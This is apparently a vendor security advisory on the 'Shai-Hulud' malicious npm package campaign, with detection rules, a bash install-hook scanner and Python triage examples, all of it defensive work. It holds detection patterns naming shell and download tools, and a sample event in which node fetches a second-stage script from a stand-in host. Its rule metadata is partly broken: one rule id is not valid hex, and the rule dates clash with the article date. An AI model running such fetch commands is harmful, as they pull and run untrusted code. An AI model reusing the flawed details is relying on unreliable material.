
Shai-Hulud Supply Chain Attack: Detection and Remediation for 600 Compromised npm Packages

Security Arsenal Team
May 19, 2026

A massive supply-chain attack campaign, dubbed "Shai-Hulud," has flooded the Node Package Manager (npm) registry with over 600 malicious packages. This is not a simple dependency confusion error; it is a coordinated typosquatting and obfuscation operation designed to infiltrate development environments and CI/CD pipelines.

For defenders, the urgency is high: a single npm install command in a compromised environment can trigger the execution of malware capable of stealing environment variables (AWS, Azure, GCP keys), cryptocurrency wallet data, and establishing persistence. This article provides the technical analysis and defensive intelligence required to hunt for, identify, and remediate this threat immediately.

Technical Analysis

Affected Platform: Node Package Manager (npm), Node.js runtime environments (Windows, Linux, macOS).

Attack Vector:

  1. Typosquatting: Threat actors publish packages with names intentionally similar to popular legitimate libraries (e.g., axios-utils vs axios or express-proxy vs express-proxy-middleware).
  2. Malicious Installation Scripts: The primary infection vector resides in the package.json file of these malicious packages, specifically the preinstall, postinstall, or install scripts, which npm runs automatically during installation.
  3. Payload Execution: Upon execution (npm install malicious-pkg), the script runs a shell command. In the Shai-Hulud campaign, this typically involves:
    • Windows: Spawning powershell.exe with Base64-encoded commands (-Enc or -EncodedCommand) to download and execute further payloads or exfiltrate data.
    • Linux/macOS: Spawning bash or sh to utilize curl or wget for fetching remote scripts, often using pastebin or similar text storage services to host the second stage.

Exploitation Status: Active exploitation in the wild. The packages are currently being published and downloaded.

Detection & Response

The Shai-Hulud campaign relies on the trust relationship between the developer and the package manager. The key observable behavior is the Node Package Manager (npm or node) spawning unauthorized shell processes (powershell, bash, sh) or network utilities (curl, wget).
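The observable described above, as an added Python example (not part of the original advisory): the parent/child logic of the Sigma rules applied to constructed process-creation events, with the -enc payload decoded for triage. The event field names and sample paths are assumptions.

```python
import base64
import ntpath
import posixpath

# Constructed sample process-creation events (not real telemetry); the fields
# mirror the process_creation logsource used by the Sigma rules. The encoded
# command is built at import time from a harmless string so the sample is readable.
_ENC = base64.b64encode("Write-Host demo".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"host": "win-dev01", "parent": r"C:\Program Files\nodejs\node.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -w hidden -enc " + _ENC},
    {"host": "lnx-ci03", "parent": "/usr/bin/node", "image": "/usr/bin/curl",
     "cmdline": "curl -s https://example.invalid/stage2.sh"},
    {"host": "win-dev02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]
NPM_PARENTS = {"npm", "npm.cmd", "npm.exe", "node", "node.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh"}
NET_TOOLS = {"curl", "wget"}
ENCODED_FLAGS = ("-encodedcommand", "-enc ")

def basename(path):
    """Last path component for Windows or POSIX paths, whatever the host OS."""
    return ntpath.basename(path) if "\\" in path else posixpath.basename(path)

def decode_encoded_powershell(cmdline):
    """Decode the argument after -enc/-EncodedCommand (base64 of UTF-16LE)."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ("-enc", "-encodedcommand"):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None

def classify(event):
    """Apply the logic of the two Sigma rules; returns (level, reason) or None."""
    parent, child = basename(event["parent"]).lower(), basename(event["image"]).lower()
    if parent not in NPM_PARENTS:
        return None
    cmd = event["cmdline"]
    if child in ("powershell.exe", "pwsh.exe") and any(f in cmd.lower() for f in ENCODED_FLAGS):
        decoded = decode_encoded_powershell(cmd) or "<undecodable>"
        return ("high", "encoded PowerShell spawned by npm/node: " + decoded)
    if child in SHELLS | NET_TOOLS:
        return ("medium", f"npm/node spawned {child}: {cmd}")
    return None
```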

SIGMA Rules

YAML
---
title: Potential Shai-Hulud NPM Malware - PowerShell Encoded Payload
id: 8d4f2c10-9b5a-4a6e-8d1f-2c3b4a5d6e7f
status: experimental
description: Detects npm or node processes spawning PowerShell with encoded commands, a hallmark of the Shai-Hulud supply chain attack utilizing postinstall scripts.
references:
  - https://www.bleepingcomputer.com/news/security/new-shai-hulud-malware-wave-compromises-600-npm-packages/
author: Security Arsenal
date: 2024/10/24
tags:
  - attack.execution
  - attack.t1059.001
  - attack.initial_access
  - attack.t1195.002
logsource:
  category: process_creation
  product: windows
detection:
  selection:
    ParentImage|endswith:
      - '\npm.exe'
      - '\npm.cmd'
      - '\node.exe'
    Image|endswith: '\powershell.exe'
    CommandLine|contains:
      - '-EncodedCommand'
      - '-enc '
  condition: selection
falsepositives:
  - Legitimate build scripts utilizing PowerShell (Rare in standard npm usage)
level: high
---
title: NPM Spawning Shell or Network Tools on Linux
id: 9e5g3d21-0c6b-5b7f-9e2g-3d4c5e6f7a8b
status: experimental
description: Detects npm processes spawning bash, sh, curl, or wget, indicative of malicious postinstall scripts fetching payloads or exfiltrating data.
references:
  - https://www.bleepingcomputer.com/news/security/new-shai-hulud-malware-wave-compromises-600-npm-packages/
author: Security Arsenal
date: 2024/10/24
tags:
  - attack.execution
  - attack.t1059.004
  - attack.command_and_control
  - attack.t1105
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentImage|endswith:
      - '/npm'
      - '/node'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/curl'
      - '/wget'
  condition: selection
falsepositives:
  - Legitimate development scripts requiring system calls (Verify script legitimacy)
level: medium

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for Shai-Hulud indicators: npm spawning suspicious processes
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where InitiatingProcessFileName in~ ("npm.exe", "node.exe", "npm", "node")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "bash", "sh", "curl", "wget")
| project Timestamp, DeviceName, InitiatingProcessFileName, FileName, ProcessCommandLine, AccountName, FolderPath
| order by Timestamp desc

Velociraptor VQL

VQL — Velociraptor
-- Hunt for Shai-Hulud: Node.js spawning shells or network tools
-- Parentheses are required: AND binds tighter than OR, so without them the
-- query returns every child of node. The regexes are anchored so that "sh"
-- does not match ssh/zsh and "node" does not match nodemon.
SELECT Pid, Name, CommandLine, Exe, Username, Parent.Pid AS ParentPid, Parent.Name AS ParentName
FROM pslist()
WHERE (Parent.Name =~ "^(node|npm)(\\.exe|\\.cmd)?$")
  AND Name =~ "^(powershell|pwsh|cmd|bash|sh|curl|wget)(\\.exe)?$"

Remediation Script (Bash)

This script scans the node_modules directory for package.json files containing suspicious script hooks (preinstall, install, postinstall) that invoke shells or network tools, which is the primary method of persistence for Shai-Hulud.

Bash / Shell
#!/bin/bash
# Security Arsenal - Shai-Hulud Remediation Scanner
# Scans node_modules for package.json files with suspicious script hooks

echo "[*] Shai-Hulud Supply Chain Scanner"
echo "[*] Scanning current directory for node_modules..."

if [ ! -d "node_modules" ]; then
    echo "[!] No node_modules directory found in current path."
    exit 0
fi

echo "[*] Analyzing package.json files for suspicious script hooks..."

# Lifecycle hooks that npm runs automatically at install time
HOOKS='"preinstall"\|"postinstall"\|"install"'
# Shell/network tooling, encoding and eval-style constructs inside a hook.
# The surrounding [^[:alpha:]] guards stop "sh" matching "publish" or "fresh".
SUSPICIOUS='(^|[^[:alpha:]])(curl|wget|bash|sh|powershell|base64|eval)($|[^[:alpha:]])|\$\('

# -print0 / read -d '' keep paths with spaces or odd characters intact
find node_modules -name "package.json" -type f -print0 | while IFS= read -r -d '' file; do
    # Only inspect packages that declare an install-time hook at all
    grep -q "$HOOKS" "$file" || continue
    # Check the hook line plus the next 5 lines for suspicious keywords
    if grep -A 5 "$HOOKS" "$file" | grep -qiE "$SUSPICIOUS"; then
        echo "[!] SUSPICIOUS PACKAGE DETECTED: $file"
        echo "    Contains script hook with shell/network commands."
        # Print the hook block for analyst context
        grep -A 5 "$HOOKS" "$file" | head -n 6
    fi
done

echo "[*] Scan complete."
echo "[*] Recommended Action: Run 'npm audit' and review specific package versions."

Remediation

  1. Immediate Audit: Run npm audit in all development and production environments. While Shai-Hulud packages are new, the npm registry updates advisories quickly. Pay strict attention to "moderate" and "high" severity vulnerabilities related to "malicious path" or "prototype pollution."

  2. Check package.json Integrity: Review your package-lock.json against the source control repository. Look for packages that:

    • You do not recognize.
    • Are slightly misspelled versions of popular packages (e.g., react-dom vs react-domx).
    • Were recently added without a corresponding PR or ticket.
  3. Clean and Reinstall: If a malicious package is identified:

    • Delete the node_modules folder.
    • Delete the package-lock.json file.
    • Review and clean the package.json to remove the malicious dependency.
    • Run npm install to regenerate the lock file with clean versions.
  4. Credential Rotation: If your environment was compromised (i.e., the malware executed), assume that environment variables (.env files) containing cloud keys (AWS/Azure/GCP), database credentials, or API tokens were exfiltrated. Rotate these secrets immediately.

  5. Developer Education: Mandate that developers use npm audit as a pre-commit hook or a pre-merge gate in CI/CD pipelines to catch typosquatting attacks before they reach production builds.
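Steps 2 and 3 above, as an added Python example (not the advisory's own script): it diffs the lockfile root against the source-controlled package.json, flags names that resemble popular packages, and flags entries carrying npm's hasInstallScript marker. The two sample files and the popular-name list are constructed for the example.

```python
import json
from difflib import SequenceMatcher

# Constructed sample inputs (not real project files): the package.json kept in
# source control and the package-lock.json found on the affected machine.
PACKAGE_JSON = json.loads('''{"name": "demo-app",
 "dependencies": {"axios": "^1.6.0", "express": "^4.18.0"},
 "devDependencies": {"jest": "^29.0.0"}}''')
PACKAGE_LOCK = json.loads('''
{"name": "demo-app", "lockfileVersion": 3, "packages": {
  "": {"dependencies": {"axios": "^1.6.0", "express": "^4.18.0", "axios-utils": "1.0.3"},
       "devDependencies": {"jest": "^29.0.0"}},
  "node_modules/axios": {"version": "1.6.8"},
  "node_modules/express": {"version": "4.18.3"},
  "node_modules/axios-utils": {"version": "1.0.3", "hasInstallScript": true},
  "node_modules/jest": {"version": "29.7.0", "dev": true},
  "node_modules/express/node_modules/debug": {"version": "2.6.9"}}}''')
# Assumed starter list of popular names; extend it for your own stack.
POPULAR = ["axios", "express", "react", "react-dom", "lodash", "jest"]
DEP_KEYS = ("dependencies", "devDependencies", "optionalDependencies")

def declared(manifest):
    """Dependency names in a package.json-style object (or a lockfile root)."""
    return {n for k in DEP_KEYS for n in manifest.get(k, {})}

def lookalike(name, popular=POPULAR):
    """Popular name this one imitates: near-identical spelling (react-domx vs
    react-dom) or the popular name with a suffix bolted on (axios-utils vs axios)."""
    if name in popular:
        return None
    for p in sorted(popular, key=len, reverse=True):  # longest match wins
        if name.startswith(p + "-") or SequenceMatcher(None, name, p).ratio() >= 0.85:
            return p
    return None

def audit_lock(manifest, lock):
    """Diff a v2/v3 lockfile's 'packages' map against the manifest; returns {name: [reasons]}."""
    findings = {}
    packages = lock.get("packages", {})
    for name in declared(packages.get("", {})) - declared(manifest):
        findings.setdefault(name, []).append("in lockfile root but not in source-controlled package.json")
    for path, meta in packages.items():
        if not path.startswith("node_modules/"):
            continue
        name = path.rsplit("node_modules/", 1)[1]  # keeps @scope/name intact
        near = lookalike(name)
        if near:
            findings.setdefault(name, []).append(f"name resembles popular package '{near}'")
        if meta.get("hasInstallScript"):
            findings.setdefault(name, []).append("declares an install-time script hook (hasInstallScript)")
    return findings
```

Every flagged name is a review item, not a verdict: a legitimate helper such as express-session will trip the suffix rule, so confirm against the PR or ticket that introduced it before deleting and reinstalling.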
